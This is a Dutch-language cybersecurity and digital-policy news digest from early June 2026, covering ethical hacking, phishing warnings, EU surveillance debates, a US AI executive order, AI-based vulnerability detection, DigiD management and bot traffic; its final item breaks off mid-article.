Recentelijk demonstreerde het televisieprogramma ‘Hacked’ dit, waarin ethische hackers bij diverse Belgische bedrijven binnendrongen. Keanu Nys, ethische hacker bij Spotit, was een van deze experts. Hij merkt op dat het programma IT managers en bedrijfsleiders heeft wakker geschud en het nut van ethisch hacken steeds meer wordt ingezien.
Een opvallend voorbeeld uit het programma was de succesvolle poging om het netwerk van Stad Herentals binnen te dringen via een onbeveiligde printer. Nys legt uit dat netwerkprinters vaker als zwak punt naar voren komen. Deze printers, geconfigureerd voor taken zoals het opslaan van bestanden of het versturen van e-mails, vereisen opgeslagen credentials. Deze zijn relatief eenvoudig op te halen en beschikken soms over te veel rechten, wat een aanzienlijk risico vormt.
Veel bedrijven geloven voorbereid te zijn, maar de realiteit kan anders zijn. De 2025 Cisco Cybersecurity Readiness Index toont aan dat slechts vier procent van de organisaties volledig is voorbereid op moderne cyberaanvallen, terwijl 34 procent dit wel denkt te zijn. Dit betekent dat slechts ongeveer één op de tien organisaties die zichzelf als weerbaar beschouwen, dit ook daadwerkelijk is.
Nys deelt cruciale tips om de cybersecurity te versterken. Multifactorauthenticatie (MFA) zou een standaardreflex moeten zijn, maar wordt nog steeds vaak niet volledig toegepast, of er zijn uitzonderingen. Dit biedt aanvallers een eenvoudige ingang. Daarnaast zijn password managers essentieel voor het veilig genereren en beheren van unieke wachtwoorden. Het belang van phishing awareness en trainingen voor werknemers blijft eveneens groot, aangezien phishing een belangrijke aanvalsfactor is die ethische hackers regelmatig misbruiken. Hoewel tools een groot deel van phishingaanvallen kunnen detecteren, is awareness training onmisbaar voor de aanvallen die toch de verdediging passeren.
Een veelvoorkomende, maar verkeerde mindset bij bedrijven is de focus op 100 procent preventie van aanvallen, in plaats van op de detectie ervan. Aanvallers zullen altijd wel een manier vinden om binnen te komen. Eenmaal ze toegang hebben, begint het proces van bijvoorbeeld het verkrijgen van meer rechten. Deze activiteiten kunnen snel opvallen binnen systemen. Met goede tools en een alert security team kunnen aanvallen alsnog worden voorkomen en de impact beperkt blijven.
Voor kleine en middelgrote ondernemingen (kmo’s) of bedrijven met beperkte budgetten die hun cyberveiligheid willen testen, zijn pentesten een uitstekend startpunt. Deze bieden helderheid over de grootste security problemen en dienen als een concreet overzicht van risico’s. Nys stelt dat dergelijke tests, waarbij niet fysiek wordt ingebroken maar puur op technisch vlak naar security problemen wordt gezocht, al voor een beperkt aantal dagen kunnen worden uitgevoerd. De meeste klanten laten ongeveer jaarlijks een pentest uitvoeren. Dit is noodzakelijk gezien de voortdurende evolutie van security uitdagingen en de constante stroom van nieuwe kwetsbaarheden, om aanvallers voor te blijven.
Bron: ITDaily | Bron 2: newsroom.cisco.com
02 juni 2026 | EDRi waarschuwt voor surveillance en uitsluiting door digitalisering Brussel
De Europese digitale burgerrechtenbeweging EDRi slaat alarm over een omvangrijk digitaliseringsproject van de Europese Commissie en andere Europese instanties. Volgens EDRi schuilt achter de retoriek van efficiëntie, modernisering en burgerparticipatie een verontrustende realiteit die leidt tot surveillance, controle en uitsluiting, vooral van reeds gemarginaliseerde groepen. EDRi stelt dat dit geen louter technische upgrade van publieke dienstverlening is, maar een weloverwogen politieke keuze om individuele zorg en rechten op te offeren ten gunste van het normaliseren van toezicht en controle. De plannen hebben onder meer invloed op de werking van zorg- en sociale zekerheidssystemen.
De beweging merkt op dat de digitalisering van sociale zekerheid vaak fungeert als een Trojaans paard voor bezuinigingen, waarbij de Nederlandse Toeslagenaffaire als voorbeeld wordt aangehaald. Door een digitale interface tussen aanvrager en dienstverlener te plaatsen, kunnen staten zich volgens EDRi onttrekken aan hun verplichtingen. Het "sociaal vangnet" dreigt te veranderen in een "digitaal sleepnet", waarbij de gegevens van burgers worden verzameld en geanalyseerd via een bestuursarchitectuur die identiteitsvaststelling en vertrouwen van bovenaf herdefinieert, met als doel ontvangers met argwaan te benaderen.
EDRi benadrukt dat het niet om één enkel groot project gaat, maar om verschillende overlappende initiatieven, zoals de European Health Data Space (EHDS) en de portefeuille voor de Europese Digitale Identiteit. Een van de meest opvallende punten van het digitaliseringsplan is volgens de burgerrechtenbeweging de wankele juridische basis. EU-verdragen bepalen dat het aanbieden van publieke diensten, zoals gezondheidszorg, sociale zekerheid en onderwijs, primair een bevoegdheid van de lidstaten zelf is. De EU heeft geen mandaat om te dicteren hoe een burger in Roemenië toegang krijgt tot een arts, of hoe iemand in Portugal een werkloosheidsuitkering aanvraagt.
Om dit gebrek aan bevoegdheden te omzeilen, heeft de Europese Commissie 'soft law' en 'competence creep' toegepast. Hierbij wordt gesteld dat digitalisering deel uitmaakt van de 'interne markt' of 'grensoverschrijdende interoperabiliteit', met als doel data-uitwisseling tussen nationale systemen via digitalisering te vereenvoudigen. Op deze wijze heeft Brussel zich in het hart van het nationaal sociaal beleid weten te positioneren, aldus EDRi.
De burgerrechtenbeweging waarschuwt voor ingrijpende gevolgen voor de privacy van individuen. De verschuiving van 'lokale en analoge' interacties naar 'gecentraliseerde en digitale' zichtbaarheid betekent dat vitale diensten standaard digitaal worden en elk gebruik een 'datapunt' zal opleveren. De verzameling van deze datapunten kan een volledig inzicht in iemands leven geven, wat niet alleen kan leiden tot datalekken, maar ook tot vergaande profilering.
Een ander kritiekpunt van EDRi is dat dergelijke systemen vaak 'privacy by design' als een retorisch schild gebruiken. Privacy gaat volgens hen niet alleen over het vertrouwelijk houden van informatie, maar ook over het gebruik van infrastructuur om macht uit te oefenen. Zelfs als data versleuteld is, is de vereiste om een door de staat goedgekeurde digitale tool te gebruiken om een fundamenteel recht uit te oefenen, op zichzelf een vorm van surveillance. Dit creëert een 'knelpunt' waar de staat met een druk op de knop de toegang tot essentiële diensten kan uitschakelen.
EDRi concludeert met de waarschuwing dat Brussel de drang naar digitalisering vaak als onvermijdelijk presenteert. Dit is echter een politieke keuze die marktintegratie en administratieve controle boven fundamentele rechten en sociale inclusie plaatst. EDRi vreest dat dit uiteindelijk zal leiden tot een Europa waarin de staat niet langer een aanbieder van diensten is, maar een beheerder van digitale inloggegevens, en waar burgers niet langer rechten hebben, maar gebruikers zijn van wie de toegang kan verlopen.
Bron: EDRi | Bron 2: maps.app.goo.gl
02 juni 2026 | Fraudehelpdesk waarschuwt voor valse sms over onbetaalde schuld
De Fraudehelpdesk heeft recentelijk meldingen ontvangen over een nieuwe golf van valse sms-berichten die ontvangers proberen te misleiden met betrekking tot een vermeende onbetaalde schuld. Deze aanval met smishing is zorgvuldig opgezet en maakt gebruik van personalisatie om de geloofwaardigheid te vergroten. De aanhef van de sms-berichten vermeldt de volledige naam van de ontvanger, wat direct een gevoel van urgentie en authenticiteit creëert.
In de tekst van de valse sms wordt gesuggereerd dat de ontvanger een openstaande schuld heeft, ondanks eerdere aanmaningen die nooit zijn verstuurd of ontvangen. De afzenders dreigen met het inschakelen van een gerechtsdeurwaarder die beslag zal leggen op eigendommen indien de schuld niet onmiddellijk wordt voldaan. Om de ontvanger aan te zetten tot snelle actie, wordt een link in de sms aangeboden waarop geklikt moet worden om de betaling te regelen.
Wie op de kwaadaardige link klikt, komt terecht op een zorgvuldig nagemaakte webpagina die de huisstijl van de Belastingdienst imiteert. Deze valse website is voorzien van een chatbox, waar slachtoffers naar verluidt een betaallink kunnen aanvragen. Dit proces is bedoeld om de slachtoffers verder te leiden en hen te verleiden tot het overmaken van geld aan de oplichters.
De Fraudehelpdesk benadrukt met klem dat deze sms-berichten en de bijbehorende website volledig vals zijn. Er wordt dan ook dringend geadviseerd om niet op de link in de sms te klikken, geen betaallink aan te vragen via de chatbox op de nepwebsite en in geen geval geld over te maken. Bij twijfel over de echtheid van een bericht van de Belastingdienst, adviseert de Fraudehelpdesk om altijd zelf direct contact op te nemen met de Belastingdienst via de officiële kanalen om de authenticiteit na te vragen.
Ontvangers die een dergelijke sms hebben ontvangen, worden aangemoedigd om dit te melden bij de Fraudehelpdesk. Indien men toch op de link heeft geklikt en geld heeft overgemaakt, is het raadzaam om zo snel mogelijk contact op te nemen met de Fraudehelpdesk voor persoonlijk advies en verdere stappen.
Bron: Fraudehelpdesk
03 juni 2026 | Baanbrekend vonnis: bank moet phishing slachtoffers terugbetalen
De ondernemingsrechtbank in Antwerpen heeft een baanbrekend vonnis uitgesproken in een phishingzaak, waarbij een bank is veroordeeld tot onmiddellijke terugbetaling van 49.958 euro aan een bejaard echtpaar. Het echtpaar, 90 en 93 jaar oud, verloor het bedrag nadat ze slachtoffer waren geworden van een valse bankmedewerker. De bank weigerde aanvankelijk de schade te vergoeden, maar is nu in kort geding gedwongen tot terugbetaling.
Phishingspecialist en advocaat Geert Lenssens noemt de uitspraak "baanbrekend". Volgens Lenssens doen banken er vaak alles aan om niet te hoeven betalen in dergelijke zaken, maar dit vonnis schept een precedent. Het is een belangrijke ontwikkeling voor slachtoffers van phishing, die nu mogelijk meer kans hebben om hun verloren geld via de rechter terug te vorderen. De details van de uitspraak zijn bekend geworden via een beschikking die door HLN is ingekeken. Dit vonnis kan significante gevolgen hebben voor de manier waarop banken in België en mogelijk ook Nederland omgaan met de terugbetaling van bedragen die door cybercriminaliteit, zoals phishing, zijn ontvreemd. Het benadrukt de verantwoordelijkheid van financiële instellingen om hun klanten te beschermen tegen online fraude.
Bron: HLN
03 juni 2026 | Witte Huis presenteert aangescherpte AI-executieve order voor innovatie en cybersecurity
Het Witte Huis heeft dinsdag een langverwachte uitvoerende order over kunstmatige intelligentie (AI) bekendgemaakt. Deze herziene versie, die volgt op een eerder concept dat vorige maand werd verworpen na interne onenigheid, richt zich op het bevorderen van innovatie op het gebied van AI en de beveiliging hiervan. Een belangrijke wijziging ten opzichte van de vorige versie is de aanpassing van de vrijwillige beoordelingsperiode voor overheidstesten van AI modellen: deze is nu gesteld op 30 dagen na publieke release, in plaats van de eerder voorgestelde 90 dagen. Rapporten suggereerden dat leiders uit de AI-industrie aandrongen op een beoordelingstermijn van 14 dagen.
De order benadrukt dat federale toegang tot AI modellen onderworpen moet zijn aan "passende vertrouwelijkheid, cybersecurity, bescherming tegen risico's door insiders en vereisten voor intellectueel eigendom, gebruik en geheimhouding". De industrie wordt opgeroepen om samen te werken met de overheid om "vertrouwde partners" te selecteren. Deze partners zouden toegang krijgen tot speciaal aangewezen "covered frontier" modellen om de cybersecurity van kritieke infrastructuur te versterken en cyberdreigingen in een geclassificeerde omgeving te volgen. Ontwikkelaars van AI moeten met de overheid bepalen welke modellen worden aangewezen en welke partners worden ingeschakeld.
De uitvoerende order stelt expliciet dat het vrijwillige kader niet moet worden gezien als een autorisatie voor de "creatie van een verplichte overheidslicentie, voorafgaande goedkeuring of vergunningsvereiste voor de ontwikkeling, publicatie, release of distributie van nieuwe AI modellen, inclusief frontier modellen".
Daarnaast mandateert de order dat functionarissen van de uitvoerende macht, onder leiding van het ministerie van Financiën, een "AI cybersecurity clearinghouse" opzetten. Dit clearinghouse moet de samenwerking tussen overheid, industrie en beheerders van kritieke infrastructuur vergemakkelijken. Het ministerie van Financiën wordt ook opgedragen om kwetsbaarheden, geïdentificeerd door AI modellen, te scannen en de prioriteit voor patching te bepalen. Verder moeten het Office of the National Cyber Director, de Cybersecurity and Infrastructure Security Agency (CISA) en het Office of Management and Budget federale subsidiefondsen lokaliseren die kunnen worden gebruikt voor geavanceerde detectie van kwetsbaarheden in AI.
De order werd achter gesloten deuren ondertekend, nadat een publieke ondertekening van de vorige versie op het laatste moment werd geannuleerd als gevolg van interne conflicten. Deze conflicten ontstonden tussen sommige overheidsfunctionarissen en voormalig AI- en crypto-adviseur David Sacks, die de president informeerde over zorgen vanuit de industrie dat de bepalingen innovatie en concurrentie met China zouden schaden. De president gaf toen aan "bepaalde aspecten" van de order niet te waarderen, daarbij verwijzend naar de dreiging die uitgaat van China.
De regering heeft zich grotendeels gericht op een AI-strategie die de nadruk legt op deregulering. Deze aanpak is echter de afgelopen weken ter discussie gesteld, aangezien nieuwe modellen zoals Anthropic’s Mythos zijn opgedoken als aanzienlijke cybersecuritydreigingen, in staat om autonoom zero-day kwetsbaarheden te ontdekken en te misbruiken. Senator Mark Warner (D-VA), voorzitter van de Senaatscommissie voor Inlichtingen, sprak zijn steun uit voor de bepalingen in de uitvoerende order. Hoewel hij de maatregelen prees als noodzakelijke hervormingen, bekritiseerde hij de regering ook voor het intrekken van een eerdere AI-uitvoerende order van de Biden-administratie die vergelijkbare doelen had.
Bron: White House | Bron 2: politico.com | Bron 3: recordedfuture.com
03 juni 2026 | Mullvad vreest einde vrij internet door identiteitsverificatie
Vpn-provider Mullvad waarschuwt dat de introductie van leeftijds- of identiteitsverificatie op het internet kan leiden tot het einde van een vrij en anoniem digitaal landschap. Het bedrijf uit zijn zorgen in een uitgebreid betoog en vergelijkt de mogelijke toekomst met de dystopie van George Orwell's '1984', waarin staatsgecontroleerde apparaten en informatie de norm zijn.
Steeds meer landen, waaronder het Verenigd Koninkrijk en de Verenigde Staten, overwegen de invoering van leeftijdsverificatie voor sociale media en andere websites. Er zijn zelfs discussies over het verplicht stellen van dergelijke verificatie voor vpn-providers. Mullvad stelt dat 'leeftijdsverificatie' in de praktijk neerkomt op 'identiteitsverificatie', aangezien gebruikers zich moeten identificeren bij de diensten die ze willen gebruiken, of bij een derde partij die hun identiteit aan hun online activiteiten kan koppelen. De vpn-provider vreest dat deze informatie via commerciële overeenkomsten of met overheden zal worden gedeeld, wat de vrijheid van informatie ernstig zou beperken.
De gevolgen hiervan zijn volgens Mullvad aanzienlijk: gebruikers zouden niet langer anoniem gereguleerde websites kunnen bezoeken of anoniem kunnen reageren op sociale media. Dit kan leiden tot angst om kritiek te uiten op overheden, met potentieel ernstige consequenties afhankelijk van het land waar men woont.
Sommige landen overwegen identiteitsverificatie direct in te bouwen op het niveau van systemen, appstores of besturingssystemen. Mullvad merkt op dat gebruikers in dergelijke gevallen nog zouden kunnen uitwijken naar opensourcesystemen, die door hun open en aanpasbare aard niet volledig door autoriteiten te besturen zijn. Echter, om volledige controle te verkrijgen, zouden overheden uiteindelijk apparaten moeten verbieden die niet door de staat worden gecontroleerd, wat de weg opent naar een 'telescreen'-achtige situatie zoals in '1984'.
Eerder dit jaar introduceerde de Europese Commissie een app voor leeftijdsverificatie, die volgens hen 'volledig anoniem' zou zijn. Mullvad betwist deze claim. Gebruikers moeten hun identiteit bij een derde partij (zoals EU-lidstaten) verifiëren met een identiteitsbewijs. Deze partij verstrekt vervolgens een credential aan het sociale mediaplatform. Hoewel het platform de leeftijd kan zien, weet de derde partij welke credentials bij welke persoon horen. Dit maakt het volgens Mullvad eenvoudig voor autoriteiten om, bij onwelgevallige content, de credential bij het platform op te vragen en zo de persoon te identificeren.
Een mogelijke oplossing hiervoor is Zero-Knowledge Proof (ZKP) cryptografie, waarbij de derde partij de credentials niet kan koppelen aan gebruikersaccounts op platforms. De huidige Europese app voor leeftijdsverificatie ondersteunt deze functionaliteit niet en mocht dit in de toekomst wel het geval zijn, dan zou het een optionele feature zijn die landen kunnen uitschakelen of de EU kan verwijderen, aldus Mullvad.
De vpn-provider concludeert dat de "veiligheid" van kinderen al geruime tijd wordt misbruikt als argument door inlichtingendiensten en autoriteiten om massasurveillance te rechtvaardigen. Mullvad roept politici op de haast waarmee leeftijdsverificatie wordt ingevoerd af te remmen en de verregaande gevolgen voor de burgerlijke vrijheden te overwegen.
Bron: youtu.be
03 juni 2026 | Cyprus werkt aan nieuw compromisvoorstel voor EU-chatcontrole
Cyprus, de huidige voorzitter van de Europese Unie, bereidt een nieuw compromisvoorstel voor met betrekking tot de omstreden chatcontroleregelgeving. Dit voorstel zal naar verwachting binnenkort worden gepresenteerd aan de Europese Commissie, de Raad en het Europees Parlement. Minister Van Weel van Justitie en Veiligheid heeft de Tweede Kamer hierover geïnformeerd in een recente brief. Het Cypriotische voorzitterschap heeft als doelstelling om deze maand tot een Europees akkoord over chatcontrole te komen.
Eind vorig jaar stemden de lidstaten van de EU al in met een Deens voorstel voor chatcontrole. Dit voorstel voorziet erin dat technologiebedrijven op vrijwillige basis permanent het verkeer van gebruikers, waaronder chatberichten, controleren. De mogelijkheid bestaat echter dat deze controle in de toekomst verplicht wordt gesteld. Bovendien omvat het Deense voorstel ook een verplichte online leeftijdsverificatie. Hoewel voorstanders benadrukken dat de uitvoering van chatcontrole vrijwillig blijft, bevat het voorstel een clausule voor herziening.
Deze clausule stelt dat binnen drie jaar de noodzaak en haalbaarheid van het opnemen van detectieverplichtingen in het toepassingsgebied van de verordening zal worden onderzocht. Voormalig minister van Justitie en Veiligheid Van Oosten had vorig jaar al gewezen op de aanwezigheid van deze clausule. Momenteel zijn de Europese Commissie, de Raad en het Europees Parlement in onderhandeling over de exacte inhoud van de verordening.
Minister Van Weel heeft aangegeven dat het kabinet zich zal buigen over het aanstaande compromisvoorstel van Cyprus. Naar aanleiding van vragen van het CDA over de positie van de minister ten aanzien van zogenaamde detectiebevelen, liet Van Weel weten dat hierover nog niet is gesproken in de onderhandelingen. De Europese Commissie heeft de wens geuit om diensten te kunnen verplichten al het verkeer van hun gebruikers te controleren, inclusief chatberichten.
Patrick Breyer, voormalig Europarlementariër en uitgesproken criticus van chatcontrole, stelt dat de definitieve inhoud van de regelgeving voor chatcontrole 2.0 momenteel in een trialoog wordt besproken. Breyer waarschuwt voor de mogelijke gevolgen, waaronder permanente en willekeurige massale surveillance van berichten en chats naar eigen inzicht van providers. Hij vreest tevens voor ineffectieve netwerkblokkering, verplichte verificatie van leeftijd die het einde van anonieme communicatie betekent, censuur in appstores en de uitsluiting van minderjarigen uit de digitale wereld. Vpn-dienst Mullvad heeft eveneens zijn bezorgdheid geuit, stellende dat verificatie van identiteit het einde van het vrije internet zou kunnen betekenen.
Bron: Tweede Kamer
03 juni 2026 | Overdracht beheer van DigiD na verbod op overname Solvinity duurt 6 tot 12 maanden
De overdracht van het beheer van DigiD, dat momenteel door Solvinity wordt geleverd, zal zes tot twaalf maanden in beslag nemen wanneer het ondergebracht wordt bij een andere partij. Dit heeft staatssecretaris Van der Burg van Binnenlandse Zaken verklaard. De bewindsman reageerde hiermee op Kamervragen van het Kamerlid van JA21 over de veiligheidsrisico's, juridische reikwijdte en afhankelijkheden rond DigiD, Solvinity en Kyndryl. Recentelijk werd de beoogde overname van Solvinity door het Amerikaanse Kyndryl door staatssecretaris Aerdts voor Digitale Economie verboden.
Van der Burg legde uit dat ondernemingen die onder de Amerikaanse rechtsmacht vallen, op grond van de CLOUD Act verplicht kunnen worden om gegevens te verstrekken. Dit geldt ook wanneer deze gegevens zich op servers buiten de Verenigde Staten bevinden. Cruciaal hierbij is of de onderneming "possession, custody or control" heeft over de gegevens. Deze wetgeving is onder meer van toepassing op aanbieders van elektronische communicatie- en clouddiensten.
Kyndryl Inc. is een Amerikaanse onderneming en valt daarmee binnen het bereik van deze en andere Amerikaanse wetten. De zeggenschap van de VS over haar buitenlandse dochters, waaronder Kyndryl Nederland B.V. en eventueel overgenomen partijen, heeft tot gevolg dat ook zij binnen het bereik van de genoemde wetten vallen.
Met betrekking tot de toegang tot gegevens van gebruikers van DigiD, antwoordde Van der Burg dat medewerkers van Solvinity bij reguliere beheerwerkzaamheden in beginsel geen toegang hebben tot de database waarin burgerservicenummers, adressen, telefoonnummers en inloggegevens van burgers zijn opgeslagen. Hij erkende echter dat dit niet uitsluit dat medewerkers toegang tot deze databases kunnen verkrijgen, waarbij het dan gaat om (on)geautoriseerde toegang, wat mogelijk strafbaar is.
Op de vraag naar Nederlandse of Europese alternatieven gaf de staatssecretaris aan dat het kabinet van mening is dat er momenteel gelijkwaardige technologieën van Nederlandse en Europese aanbieders beschikbaar zijn. Hij verwees naar onderzoek van de Autoriteit Consument en Markt (ACM) waaruit bleek dat er na een eventuele overname van Solvinity voldoende concurrentie zou overblijven. Een versnelde overdracht van de dienstverlening van Solvinity aan een andere partij kan echter risico's met zich meebrengen.
Volgens Logius geldt voor het beheer van DigiD een overdrachtsperiode van zes tot twaalf maanden wanneer het beheer van DigiD, geleverd door Solvinity, wordt ondergebracht bij een andere beheerorganisatie. Deze periode is noodzakelijk om een nieuwe organisatie voldoende kennis en ervaring te laten opdoen met het beheer van het platform, om zo de continuïteit en veiligheid van DigiD en andere voorzieningen te waarborgen. Deze overdrachtsperiode kan echter pas ingaan wanneer een nieuwe partij is geworven. Het kabinet heeft recent besloten het contract voor het beheer van DigiD door Solvinity met twee jaar te verlengen.
Bron: Tweede Kamer
03 juni 2026 | Organisaties worstelen met operationalisering EDR te midden van AI-gestuurde aanvallen
Veel organisaties erkennen dat endpointbeveiliging op zichzelf niet langer voldoende is, wat heeft geleid tot een snelle adoptie van endpointdetectie en -respons (EDR) systemen. Het in bezit hebben van EDR-mogelijkheden vertaalt zich echter niet automatisch in operationele cyberweerbaarheid. Met name middelgrote organisaties, ondanks investeringen in geavanceerde endpointbeveiligingsplatforms, ondervinden vaak moeilijkheden bij het volledig operationaliseren van deze capaciteiten.
Slanke beveiligingsteams worden overweldigd door de grote hoeveelheid alerts, onderzoeken duren te lang en de responsmogelijkheden zijn beperkt. Moderne aanvallen bewegen sneller, omzeilen traditionele preventiemaatregelen en vereisen continue zichtbaarheid van verdachte activiteiten. Terwijl dreigingen sneller worden, vaker door AI worden ondersteund en in toenemende mate legitieme tools misbruiken om detectie te omzeilen, wordt duidelijk dat zichtbaarheid alleen niet meer volstaat. Organisaties die voorop lopen, zetten niet alleen meer detectiemogelijkheden in, maar reduceren proactief de aanvalskansen en operationaliseren de respons op een duurzame manier voor teams met beperkte middelen.
De uitdagingen bij het operationaliseren van EDR omvatten te veel alerts, onvoldoende onderzoekscapaciteit, beperkte tijd voor continue monitoring, tekorten aan vaardigheden (vooral op het gebied van dreigingsopsporing en geavanceerde respons), operationele vermoeidheid door reactieve workflows en moeite met het prioriteren van daadwerkelijk gevaarlijke activiteiten. Dit creëert een kloof tussen beveiligingscapaciteit en daadwerkelijke beveiligingsresultaten.
Door AI ondersteunde aanvallen vergroten de operationele druk op reeds overbelaste teams. Volgens het Cybersecurity Assessment Report van 2025 meldde 67% van de organisaties een toename van door AI aangedreven aanvallen. Dit betekent dat tegen de tijd dat kleinere teams alerts onderzoeken, aanvallers mogelijk al privileges hebben geëscaleerd, lateraal zijn verplaatst of persistentie hebben gevestigd. Detectie blijft essentieel, maar kan overmatige blootstelling, reactieve workflows en vertraagde respons niet compenseren. Dit geldt des te meer omdat aanvallers niet langer uitsluitend vertrouwen op malware of luidruchtige intrusietechnieken. In plaats daarvan misbruiken ze steeds vaker legitieme administratieve tools, gestolen inloggegevens en vertrouwde processen om onopgemerkt te blijven. Onderzoek van Bitdefender, waarbij meer dan 700.000 cyberincidenten werden geanalyseerd, toonde aan dat 84% van de grote aanvallen nu gebruikmaakt van living-off-the-land (LOTL) technieken.
Als antwoord op deze uitdagingen worden complementaire benaderingen zoals dynamische hardening en Managed Detection and Response (MDR) naar voren geschoven. Dynamische hardening, bijvoorbeeld via Bitdefender GravityZone PHASR, werkt door exploiteerbare omstandigheden dynamisch te verminderen voordat aanvallers hiervan kunnen profiteren. Dit gebeurt door AI te gebruiken om zich aan te passen aan gebruikersgedrag en risicovolle acties, onnodige privileges en het misbruik van legitieme tools te beperken, zonder de productiviteit te verstoren. MDR, zoals Bitdefender MDR, vult interne beveiligingsteams aan met 24/7 monitoring, dreigingsopsporing, onderzoek en snelle respons door ervaren beveiligingsprofessionals. Deze gelaagde aanpak, bestaande uit proactieve hardening, EDR-zichtbaarheid en MDR voor continue respons, stelt organisaties in staat hun beveiligingshouding aanzienlijk te versterken en tegelijkertijd de operationele complexiteit te verminderen.
Organisaties die hun bestaande EDR-investering operationaliseren met proactieve hardening en MDR, realiseren meetbare beveiligings- en bedrijfsresultaten. Dit omvat een verminderd risico op technieken die in 84% van de ernstige aanvallen worden gebruikt, snellere detectie en indamming van dreigingen, verminderde operationele last en alertmoeheid voor teams, en een groter rendement op bestaande EDR-investeringen. Het resultaat is een veerkrachtiger en duurzamer beveiligingsmodel.
Bron: The Hacker News
03 juni 2026 | Kabinet waarschuwt voor risico's bij gebruik van AI modellen voor kwetsbaarheidsdetectie
Het Nederlandse kabinet roept op tot voorzichtigheid bij het gebruik van modellen met artificiële intelligentie (AI), zoals Mythos, voor het opsporen van kwetsbaarheden. Minister Van Weel van Justitie en Veiligheid heeft dit standpunt kenbaar gemaakt in reactie op Kamervragen van D66 en GroenLinks-PvdA. De vragen volgden op berichtgeving over Mythos, een AI model ontwikkeld door Anthropic, dat naar eigen zeggen al meer dan tienduizend kwetsbaarheden heeft ontdekt.
Kamerleden El Boujdaini (D66) en Kathmann (GroenLinks-PvdA) wilden weten of overheden toegang zouden moeten krijgen tot dergelijke AI modellen om preventief kwetsbaarheden op te sporen en te dichten, en of dit veilig en verantwoord mogelijk is. De minister bepleit terughoudendheid ten aanzien van het operationele gebruik van een leveranciersmodel dat niet Europees is, als oplossing voor preventieve kwetsbaarheidsdetectie.
Volgens de bewindsman blijkt uit onderzoek dat toegang tot zogeheten AI-frontiermodellen in veel gevallen niet essentieel is voor effectieve detectie van kwetsbaarheden. Het verschil tussen frontiermodellen en minder geavanceerde modellen zou mogelijk minder groot zijn dan de berichtgeving rondom grote modelaankondigingen suggereert. Een ander punt van zorg is dat de aanbieders van AI modellen, zoals Anthropic met Mythos, de toegang en voorwaarden bepalen. Toegang onder deze voorwaarden zou de afhankelijkheid van Amerikaanse partijen vergroten.
Minister Van Weel benadrukt verder dat preventieve kwetsbaarheidsdetectie via AI veilig en verantwoord kan worden ingericht, mits dit losgekoppeld is van één specifieke leverancier. De noodzaak van toegang is afhankelijk van specifieke omstandigheden, voorwaarden en afhankelijkheden, en vereist telkens een brede afweging. Er wordt ook op gewezen dat geavanceerde AI modellen vooralsnog afkomstig zijn van commerciële bedrijven, veelal uit niet-Europese landen waar andere wet- en regelgeving geldt dan in de Europese Unie.
Dit kan ertoe leiden dat er weinig tot geen inzicht bestaat in de onderliggende systemen en software van dergelijke systemen, en dat deze systemen niet voldoen aan de Europese wet- en regelgeving. Het verder integreren van modellen met AI in Nederlandse digitale kernprocessen, waarbij de AI modellen draaien op infrastructuur van niet-Europese aanbieders, kan leiden tot een toenemende afhankelijkheid. De minister waarschuwt dat veel geavanceerde modellen met AI op niet-Europese cloudinfrastructuur draaien. Een dergelijke integratie vergroot de afhankelijkheid van niet-Europese aanbieders, met bijbehorende risico’s op het gebied van data soevereiniteit, continuïteit, vertrouwelijkheid en strategische afhankelijkheid.
Bron: Ministerie van Justitie en Veiligheid | Bron 2: tweedekamer.nl
04 juni 2026 | Bots overtreffen mensen in wereldwijd webverkeer, met gevolgen voor cybersecurity
Voor het eerst in de geschiedenis van het internet hebben geautomatiseerde bots officieel menselijke gebruikers overtroffen in het wereldwijde webverkeer. Deze verschuiving voltrekt zich sneller dan zelfs experts hadden voorspeld. Volgens gegevens van Cloudflare Radar zijn bots nu verantwoordelijk voor 57,5% van alle HTTP-verzoeken naar HTML-pagina's wereldwijd, terwijl menselijk gegenereerd verkeer is gedaald tot slechts 42,5%. In de Verenigde Staten is dit beeld nog extremer, met botverkeer dat een aandeel van 71,5% van de binnenlandse webverzoeken opeist, wat de diepgang van AI-gedreven automatisering in de meest verbonden markten van de wereld benadrukt.
Deze trend wordt bevestigd door onafhankelijke bronnen. Het 2025 Imperva Bad Bot Report stelde vast dat geautomatiseerd verkeer voor het eerst in tien jaar de drempel van 50% overschreed, en in 2024 51% van al het wereldwijde webverkeer bereikte. Het netwerk van Cloudflare zelf, dat ongeveer één op de vijf websites wereldwijd bedient, toonde eind 2025 een verhouding van ongeveer 53% botverkeer tegenover 47% menselijk verkeer op HTML-verzoeken. Matthew Prince, CEO van Cloudflare, had eerder dit jaar op SXSW voorspeld dat botverkeer pas tegen 2027 menselijk verkeer zou overtreffen, een voorspelling die nu eerder dan verwacht is uitgekomen.
Prince benadrukt het aanzienlijke verschil in browsegedrag tussen mensen en AI. Waar een mens die naar een product zoekt misschien vijf websites bezoekt, kan een AI-agent voor dezelfde taak wel 5.000 sites bevragen. Dit patroon wordt voornamelijk gedreven door AI-scrapers, crawlers voor het trainen van grote taalmodellen (LLM's) en autonome zoekagenten die zijn gebouwd op modellen zoals OpenAI’s GPT, Anthropic’s Claude en Google’s Gemini. Het AI-gedreven verkeer nam in 2025 specifiek met 187% toe, een groei die bijna acht keer sneller was dan de menselijke webactiviteit in dezelfde periode.
De toename van botverkeer heeft ernstige beveiligingsimplicaties. Van al het geautomatiseerde verkeer wordt 37% geclassificeerd als kwaadaardig, de zogenaamde "bad bots", terwijl slechts 14% legitieme crawlers zijn. Uitgevers en adverteerders kampen nu met fundamenteel vertekende analyses, aangezien verkeersdashboards machinegedrag weerspiegelen in plaats van echte gebruikersbetrokkenheid. Als reactie hierop winnen nieuwe kaders, zoals 'pay-to-crawl'-protocollen, terrein. Cloudflare is al overgegaan tot het standaard blokkeren van AI-crawlers, tenzij zij contentmakers compenseren. Naarmate autonome agenten, AI-gestuurde zoekhulpmiddelen en LLM-pijplijnen zich verder verspreiden, zal de verhouding naar automatisering verder doorslaan. De 'agent economy' is geen voorspelling meer voor 2027; het is de huidige realiteit van het internet, en de infrastructuur, verdienmodellen en beveiligingsarchitecturen van het web zullen zich dienovereenkomstig moeten aanpassen.
Bron: Cloudflare
04 juni 2026 | DHS-chef Mullin signaleert herstructurering CISA na budget- en personeelsbezuinigingen
De Amerikaanse minister van Binnenlandse Veiligheid, Markwayne Mullin, heeft woensdag aangegeven dat hij het toonaangevende civiele cyberbeveiligingsagentschap van de overheid, de Cybersecurity and Infrastructure Security Agency (CISA), nieuw leven wil inblazen. CISA is de afgelopen periode een frequent doelwit geweest van kritiek vanuit de regering.
